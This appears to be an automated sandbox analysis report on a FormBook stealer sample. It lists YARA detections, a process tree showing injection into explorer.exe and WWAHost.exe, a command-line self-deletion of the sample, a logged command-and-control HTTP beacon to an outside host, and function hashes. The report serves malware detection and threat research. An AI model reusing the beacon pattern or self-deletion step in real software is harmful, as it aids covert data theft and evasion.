href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49777	192.185.0.218	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:41:06.700105906 CET	5707	OUT	GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe HTTP/1.1 Host: www.promanconsortium.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:41:06.857851028 CET	5708	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Jan 2021 20:41:06 GMT Server: Apache/2.2.15 (CentOS) Location: https://wildcard.hostgator.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe Content-Length: 432 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6c 64 63 61 72 64 2e 68 6f 73 74 67 61 74 6f 72 2e 63 6f 6d 2f 75 72 30 36 2f 3f 77 30 47 3d 6e 64 69 54 46 50 63 48 58 78 6b 4c 47 26 61 6d 70 3b 6a 4c 33 30 76 76 3d 4e 4b 78 6e 71 66 37 61 37 6f 7a 61 76 6e 43 59 31 61 5a 46 71 72 65 52 6e 43 53 32 32 4e 43 47 30 58 67 70 6b 54 5a 52 50 6d 6f 74 4d 4f 50 33 63 59 2f 4f 58 71 59 6d 6a 53 76 61 4a 42 47 4a 6c 52 55 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 72 6f 6d 61 6e 63 6f 6e 73 6f 72 74 69 75 6d 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wildcard.hostgator.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe">here</a>.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.promanconsortium.com Port 80</address></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: JdtN8nIcLi8RQOi.exe PID: 6596 Parent PID: 5996

General

Start time:	21:39:07
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
Imagebase:	0xfc0000
File size:	842240 bytes
MD5 hash:	AEE550440966B0BD34D9CCB2B1F7F146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: JdtN8nIcLi8RQOi.exe PID: 5756 Parent PID: 6596

General

Start time:	21:39:16
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
Imagebase:	0x6a0000
File size:	842240 bytes
MD5 hash:	AEE550440966B0BD34D9CCB2B1F7F146
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 5756

General

Start time:	21:39:19
Start date:	13/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WWAHost.exe PID: 7052 Parent PID: 3424

General

Start time:	21:39:32
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\WWAHost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WWAHost.exe
Imagebase:	0x380000
File size:	829856 bytes
MD5 hash:	370C260333EB3149EF4E49C8F64652A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4832 Parent PID: 7052

General

Start time:	21:39:36
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5648 Parent PID: 4832

General

Start time:	21:39:37
Start date:	13/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: JdtN8nIcLi8RQOi.exe PID: 6596 Parent PID: 5996 JdtN8nIcLi8RQOi.exeCOMMON

Executed Functions

Function 01BA15E0, Relevance: 2.2, Strings: 1, Instructions: 969COMMON

Download Yara Rule

Strings

3/d, xrefs: 01BA1AF5

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: 3/d
API String ID: 0-1437714323
Opcode ID: 2172c36635cc55f0a0257009ac1b7eb8ddd53272e1ca2880a6c10d2ce703e1f9
Instruction ID: fdf49bad308c57df3921c5283f09e58bc9be731e44c16db207b37bd3e1354c4f
Opcode Fuzzy Hash: 2172c36635cc55f0a0257009ac1b7eb8ddd53272e1ca2880a6c10d2ce703e1f9
Instruction Fuzzy Hash: 36A2B275D04228DFDB69CF69C984BDDBBB2BF89304F5481E9D409AB225DB319A81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01BA0EA5, Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9119ea69dc7d35dc422cb7d737ab2563e3b67b19f36af84bde0ed0f0595903
Instruction ID: 98eb4998c69189c2850ec2989b98815fcf5d14f478ce1ac1b06b478adcca9f02
Opcode Fuzzy Hash: ec9119ea69dc7d35dc422cb7d737ab2563e3b67b19f36af84bde0ed0f0595903
Instruction Fuzzy Hash: 0EA11974E04208DFDB58EFA9D8846AEBBB6FF89300F60C1A9E519AB354DB355941CF10

Uniqueness

Uniqueness Score: -1.00%

Function 01BA15D0, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33755b456893a3485ed08686264cb730dbf81425bc4015891263da0f43b96075
Instruction ID: b089f03c18d3ed4b28f7afb1ee8d9e217371848a84bc0f1d28bf6b738f57315e
Opcode Fuzzy Hash: 33755b456893a3485ed08686264cb730dbf81425bc4015891263da0f43b96075
Instruction Fuzzy Hash: EEB17071E01668CBDB68DF6ACD446DDBBF2AF89305F14C1EAD809AB354DB305A858F40

Uniqueness

Uniqueness Score: -1.00%

Function 01BAABC3, Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 568cdc2ecfe2efeec3a047b771b91a6158b56fd7d87d9b45d9830ec1b2c52717
Instruction ID: 2c78d38e64816f090ba1c62042a921fe6abf7e2eb457045ada5fc4d57b3ef0b4
Opcode Fuzzy Hash: 568cdc2ecfe2efeec3a047b771b91a6158b56fd7d87d9b45d9830ec1b2c52717
Instruction Fuzzy Hash: 50912470D08209DFDB18CFBAD844AAEFBB2BF49314FA4C299D414A7255E7349942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01BA0EB8, Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d72ab707fa25ca467e6347476fc14826913649cc6819ec9236c101e48d2120
Instruction ID: 520f2066af3d8a7833a0081224463f1a19f41e34f749c60b5c0425e14d5dc7b6
Opcode Fuzzy Hash: 37d72ab707fa25ca467e6347476fc14826913649cc6819ec9236c101e48d2120
Instruction Fuzzy Hash: 71910C74E04208DFDB58EFA9D8846AEBBB6FF88300F60C169E419AB354DB355946CF10

Uniqueness

Uniqueness Score: -1.00%

Function 01BA2F7B, Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9c6d38674f17c14be1b4d2cef1fce548112ab2ded641509e456556147ab19a6
Instruction ID: b12bd8a199eaa0a57c8cda48212239922f83fe276ebab250e9ac6257c5c48def
Opcode Fuzzy Hash: f9c6d38674f17c14be1b4d2cef1fce548112ab2ded641509e456556147ab19a6
Instruction Fuzzy Hash: 7D813874D08218CFDB19EFAAC8407EDBBFABF89314F8081E9D409AB255D7355A858F11

Uniqueness

Uniqueness Score: -1.00%

Function 01BACE30, Relevance: 3.8, Strings: 3, Instructions: 54COMMON

Download Yara Rule

Strings

(, xrefs: 01BAC3AC
!, xrefs: 01BAC3DF
-, xrefs: 01BACE79

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: !$($-
API String ID: 0-2545574731
Opcode ID: 15e86bf8c014d5d76737728f4a6030c3380831186d15e613df400475b6bdf1cb
Instruction ID: ec83086bb0f2993a2533b507d0df54a6ae3dd14a0f6d496adc490fbd73a41bba
Opcode Fuzzy Hash: 15e86bf8c014d5d76737728f4a6030c3380831186d15e613df400475b6bdf1cb
Instruction Fuzzy Hash: 1C21AC74809268CFDB65DF28CD987DDBBB0EB0A315F9045DAC099A3290CBB64AC5CF01

Uniqueness

Uniqueness Score: -1.00%

Function 01BAC5C1, Relevance: 2.6, Strings: 2, Instructions: 61COMMON

Download Yara Rule

Strings

8, xrefs: 01BAC602
0, xrefs: 01BAC654

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 2fad3a170f638fe67bfb707e6fcc5e8bcc231d9d547ee382c432c7e5f949b097
Instruction ID: 66b7a0ef4326e9d1e9b38cc90d7ec2578f0cae48d63fdca477c7684fd22d9712
Opcode Fuzzy Hash: 2fad3a170f638fe67bfb707e6fcc5e8bcc231d9d547ee382c432c7e5f949b097
Instruction Fuzzy Hash: 5A31DF70915228CFDB65DF68C8947ECBBB1BB4A315F9041E9D089A7290CB355EC5CF01

Uniqueness

Uniqueness Score: -1.00%

Function 01BAB61F, Relevance: 2.6, Strings: 2, Instructions: 58COMMON

Download Yara Rule

Strings

), xrefs: 01BAB631
%, xrefs: 01BAB657

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: %$)
API String ID: 0-1922901203
Opcode ID: 517bf7067467b22877d7c7a3f7fa4d8fa600a763b0f48dba171635050cbf7fbd
Instruction ID: fe132079a0086163434371c37a36327330ddc5c10b55d907e08b5092316a9e7f
Opcode Fuzzy Hash: 517bf7067467b22877d7c7a3f7fa4d8fa600a763b0f48dba171635050cbf7fbd
Instruction Fuzzy Hash: D521AD78E09228CFDB64DF64D954BADBBB2FB0A301F5041EAD549A3344D7705A81CF16

Uniqueness

Uniqueness Score: -1.00%

Function 01BAC257, Relevance: 2.6, Strings: 2, Instructions: 50COMMON

Download Yara Rule

Strings

(, xrefs: 01BAC742
6, xrefs: 01BAC264

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: ($6
API String ID: 0-4149066357
Opcode ID: 4b6e45d9924dee5adbee0c8e8a4a6c170a58ff732afc538d8d11e5afdf0d94d7
Instruction ID: bf5f7a1ecbaaebd22bd891bb860bc803058f6d38953de4a8ffab51fbd0128c11
Opcode Fuzzy Hash: 4b6e45d9924dee5adbee0c8e8a4a6c170a58ff732afc538d8d11e5afdf0d94d7
Instruction Fuzzy Hash: 6821D075908228DFDB64CF64C884BDDBBB5FB18308F9481DAD558A7291C7369AC6CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01BA0448, Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

:@fq, xrefs: 01BA0574

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: :@fq
API String ID: 0-3673016210
Opcode ID: 80333c3d0e565564bb29d8457e92ef23d7da5f4b8625e84eb9d18e09d1d322c3
Instruction ID: 87b3e3c466810e097766f051df4b1441c52e0a1a7691a4b13d8043314eb9b111
Opcode Fuzzy Hash: 80333c3d0e565564bb29d8457e92ef23d7da5f4b8625e84eb9d18e09d1d322c3
Instruction Fuzzy Hash: BE91E474E05218CFDB18DFA9C894BADBBB2FF49304F1081A9E509AB390DB319985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01BA0439, Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

:@fq, xrefs: 01BA0574

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: :@fq
API String ID: 0-3673016210
Opcode ID: dc7da302a1148a59c5ec1ec8c65cd3f1f12c05940864f3b107602a42dab37a43
Instruction ID: 875c7f5f72fb0540eb5631d1dd74c77a2c543967fe3e187e58ed9ad36fc9e8a8
Opcode Fuzzy Hash: dc7da302a1148a59c5ec1ec8c65cd3f1f12c05940864f3b107602a42dab37a43
Instruction Fuzzy Hash: 9671F674D05218CFDB18DFA9C894BADBBB2FF49304F1085A9E509AB350DB319985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01BAD030, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

#, xrefs: 01BAC187

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 04f0444b77579ce8de6832816804f34e589d122bdef1c6b717a0dcf3c2cf4270
Instruction ID: e5a21bc367b53769b75a801a8af79dff0583ee288ad39607a7e952324c93a24f
Opcode Fuzzy Hash: 04f0444b77579ce8de6832816804f34e589d122bdef1c6b717a0dcf3c2cf4270
Instruction Fuzzy Hash: 1031E274944228DEDB74CFA8D898BDCBBF1AB19300F9084EAD118A7280D7B55AC6CF15

Uniqueness

Uniqueness Score: -1.00%

Function 01BAC07C, Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

#, xrefs: 01BAC187

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6e16774aee6c26517b09d0b93fceb258d01db248ff56066e282fc84e19fff733
Instruction ID: 4e95514a71efcbf6bc36e4ace668d4000b3934e2325b7f944be505aa73aeb778
Opcode Fuzzy Hash: 6e16774aee6c26517b09d0b93fceb258d01db248ff56066e282fc84e19fff733
Instruction Fuzzy Hash: 7531F474944228DFDB64CFA8D898BDCBBF1AB18300F5084EAD518A7280D7755AC6CF05

Uniqueness

Uniqueness Score: -1.00%

Function 01BAC40C, Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

2, xrefs: 01BAC49E

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 05a355ba5592f4a9963b318620d0da6e8ede1181a087bbe9a9453e0737e20425
Instruction ID: 008cce8725eab02995fe6d93fe8ea8ab652ad105cc5380a9876f480c0a788262
Opcode Fuzzy Hash: 05a355ba5592f4a9963b318620d0da6e8ede1181a087bbe9a9453e0737e20425
Instruction Fuzzy Hash: 3231B178808228CFDB64DF24D8887ECBBB0EB59311F9085EAD459A3290DB754BC5DF00

Uniqueness

Uniqueness Score: -1.00%

Function 01BAC076, Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

#, xrefs: 01BAC187

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: d1e5f60e45957d934e7e493473c19bcb0fb9ced7ba1715538c7b4286b82d6153
Instruction ID: 5d2b86ffe9cb814824e8d6ef2cafd1ede3cb9f1f6f74ce2d059b385c006f0b8a
Opcode Fuzzy Hash: d1e5f60e45957d934e7e493473c19bcb0fb9ced7ba1715538c7b4286b82d6153
Instruction Fuzzy Hash: ED111575948228DFDB64CF54C885BDCBBB1EB19300FA085D6E149E7280D7B69AC6CF05

Uniqueness

Uniqueness Score: -1.00%

Function 01BAC768, Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

:, xrefs: 01BAC789

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: :
API String ID: 0-336475711
Opcode ID: 06fc95d613583f16e4c6e4bff787d24b08be1e70e0c83b7220c959214c240669
Instruction ID: 21d1d29437f9908f4b832813b554ec7f5ebe6ac351bfa181374617eb4db66338
Opcode Fuzzy Hash: 06fc95d613583f16e4c6e4bff787d24b08be1e70e0c83b7220c959214c240669
Instruction Fuzzy Hash: B5115B759152288FCBA0CF68C984BDDBBB5EB49304F5481D9D44DA7261DB329EC6CF01

Uniqueness

Uniqueness Score: -1.00%

Function 01BAC6E1, Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

(, xrefs: 01BAC742

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 1df8f351638b13ca821471a6dfb2f769e444e13f5be9e18fec8f54151f438a08
Instruction ID: a95997c817ab436860273acc2b61fcd97c720c042052d018afae4adedc6c24a7
Opcode Fuzzy Hash: 1df8f351638b13ca821471a6dfb2f769e444e13f5be9e18fec8f54151f438a08
Instruction Fuzzy Hash: E801C435904128DFCB64DFA4C890BECBBB2BB49304F6480D9D549A7251CB369ED6DF01

Uniqueness

Uniqueness Score: -1.00%

Function 01BA47E5, Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

, xrefs: 01BA4836

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 5a2d72d8a91d650568bcdf98c040114dc04c0f53ac4b0f2761901b8307f579e6
Instruction ID: 478ad415b99d38fd3db5c24984a3de1122a5efc91cac4c5225e07f49637384a8
Opcode Fuzzy Hash: 5a2d72d8a91d650568bcdf98c040114dc04c0f53ac4b0f2761901b8307f579e6
Instruction Fuzzy Hash: 64E0C97490025DCFDB64DF64D898B9CB7B1FB48344F0045AAD51AB7244DB741E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01BABAA7, Relevance: 1.3, Strings: 1, Instructions: 12COMMON

Download Yara Rule

Strings

, xrefs: 01BABAD3

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 26c4180aac579b4552f85fdb5f8bad556f63bdcdf8f14c926572bd098b8667fc
Instruction ID: 3e8d82fc2e7c419caa6d2439d6fb5e5ecd040794c41a271cdabe0a42da2e9275
Opcode Fuzzy Hash: 26c4180aac579b4552f85fdb5f8bad556f63bdcdf8f14c926572bd098b8667fc
Instruction Fuzzy Hash: CFD06734409244CFE728DF64C2A8A5DBBB5FB1A305F55519DC01A5B5A2CBB45885CF01

Uniqueness

Uniqueness Score: -1.00%

Function 01BA3070, Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997f152428059429064f998a70249b4b2ad9be406503d24086e7f7c6fcd721db
Instruction ID: a2282ee0ded9cc00bb5da5e5269aa03b72634054b8c75a7b4ff725d73d461b4e
Opcode Fuzzy Hash: 997f152428059429064f998a70249b4b2ad9be406503d24086e7f7c6fcd721db
Instruction Fuzzy Hash: 51815774A08218CFDB15EFA8C844BAEBBBAFF49314F908199D409BB245C7354A85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 01BA0F21, Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371f1c5d17662d1c1444f8b8c479f55d888ec64d485780efe279a28d11a43fa6
Instruction ID: 2ddb46e33b90b2812ac830c3b2d145f828b8bc103b097142ae221ae2f530c234
Opcode Fuzzy Hash: 371f1c5d17662d1c1444f8b8c479f55d888ec64d485780efe279a28d11a43fa6
Instruction Fuzzy Hash: 7C81F974E04208DFDB58EFA9D8986AEBBB6FF88301F608169E419AB354DB355D41CF10

Uniqueness

Uniqueness Score: -1.00%

Function 01BA302F, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79a367fb7a3eedacea67504ae91e4b30885ccfe2e3024a28534b1d5327a3908b
Instruction ID: 29b3e2484788d1a6d18d5617f0d0246e21aad5300a390c9b3005c84cc5185807
Opcode Fuzzy Hash: 79a367fb7a3eedacea67504ae91e4b30885ccfe2e3024a28534b1d5327a3908b
Instruction Fuzzy Hash: 44515574E08258CFDB15EFA8C940BADBBF9BF09318F9081D9D509AB245C7354A858F11

Uniqueness

Uniqueness Score: -1.00%

Function 01BA3087, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bce06be855ca595a5953d7851468e32cba7e84050a2f0bded4d1b1d9bb12ee52
Instruction ID: adc269d7447fc0b554e1979f4863e0728bcef87bd73734aac429e5da60837c2a
Opcode Fuzzy Hash: bce06be855ca595a5953d7851468e32cba7e84050a2f0bded4d1b1d9bb12ee52
Instruction Fuzzy Hash: C9513174E08258CFDB19EFA8C944BADBBFAFF09318F9081D9D409AB245C7354A858F11

Uniqueness

Uniqueness Score: -1.00%

Function 01BA2C48, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8cb6aefcb12814ff4172cd115b186bfa9c4cf3c572e34c365a8b3f16323f682
